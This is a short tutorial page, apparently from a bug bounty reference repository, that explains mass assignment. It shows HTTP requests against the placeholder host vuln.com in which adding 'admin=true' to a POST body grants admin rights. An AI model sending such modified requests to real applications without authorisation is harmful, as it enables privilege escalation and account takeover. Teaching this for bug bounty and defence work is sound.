mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-24 05:15:25 +00:00
33 lines
581 B
Markdown
33 lines
581 B
Markdown
# Mass Assignment Attack
|
|
## Introduction
|
|
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
|
|
|
|
## How to Exploit
|
|
- Normal request
|
|
```
|
|
POST /editdata
|
|
Host: vuln.com
|
|
|
|
username=daffa
|
|
```
|
|
```
|
|
HTTP/1.1 200 OK
|
|
...
|
|
|
|
username=daffa&admin=false
|
|
```
|
|
|
|
- Modified Request
|
|
```
|
|
POST /editdata
|
|
Host: vuln.com
|
|
|
|
username=daffa&admin=true
|
|
```
|
|
|
|
```
|
|
HTTP/1.1 200 OK
|
|
...
|
|
|
|
username=daffa&admin=true
|
|
``` |